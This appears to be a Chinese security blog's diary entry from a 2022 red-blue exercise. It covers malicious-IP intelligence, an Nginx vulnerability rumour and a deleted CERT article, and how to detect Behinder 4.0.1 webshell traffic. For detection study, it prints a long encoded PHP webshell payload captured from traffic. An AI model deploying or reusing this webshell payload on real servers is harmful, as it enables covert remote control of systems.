2022护网日记第八天

杂谈

今天的分享分为三部分

  • 恶意IP/域名情报
  • 一些厂商漏洞汇总
  • 你关心的趣事

恶意IP/域名情报

图片[1]-2022护网日记第八天-FancyPig's blog
共计2837个恶意IP

一些厂商漏洞汇总

2022护网日记第八天-FancyPig's blog
隐藏内容,输入密码后查看
接到相关要求,现已隐藏漏洞相关内容,更多精彩可以关注我们的微信公众号

你关心的趣事

听说今天浪潮的🍉了吗?

大概就是在hvv的时候有热心网友加了24小时的班,然后就昏倒了……

据说医院诊断结果是“呼吸性碱中毒”,还好人没事!

大家在hvv中熬夜一定要第二天好好休息一下,健康第一位!

关于Nginx漏洞辟谣?CNVD漏洞库怎么说?奇安信CERT删文?

参考https://www.cnvd.org.cn/flaw/show/CNVD-2022-54473

应该就是LDAP模块引入导致的

图片[7]-2022护网日记第八天-FancyPig's blog

奇安信CERT也发表了自己的研判《不要让谣言驱动应急响应》

图片[8]-2022护网日记第八天-FancyPig's blog

但是文章目前好像已经删掉了,是不是因为封面过于激进?还是研判出现了失误呢?

图片[9]-2022护网日记第八天-FancyPig's blog

我们这里保存了文章的快照,供大家参考,我们这里保留自己的意见。

2022-08-02更新

https://mp.weixin.qq.com/s/cViO_ovSnHsc0nRtEg20Tg

这里推测应该是图片封面用的比较激进导致的删文

图片[10]-2022护网日记第八天-FancyPig's blog

冰蝎最新版4.0.1源码有了吗?如何分析流量特征?

源码参考《冰蝎客户端源码-V4.0.1》

这里还有热心网友如何分析冰蝎的流量?

这个很简单,你生成好webshell之后连接,用Wireshark抓包就行了,并不难!

比如我这里生成的xor_base64的php webshell,Payload如下

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
图片[11]-2022护网日记第八天-FancyPig's blog

我们对流量里的payload进行检测就可以了!需要的只是花时间去抓完相关的包,当然,你还可以观察请求头里的特征等等,这里不再赘述!

© 版权声明
THE END
喜欢就支持一下吧
点赞28赞赏 分享
评论 共20条

请登录后发表评论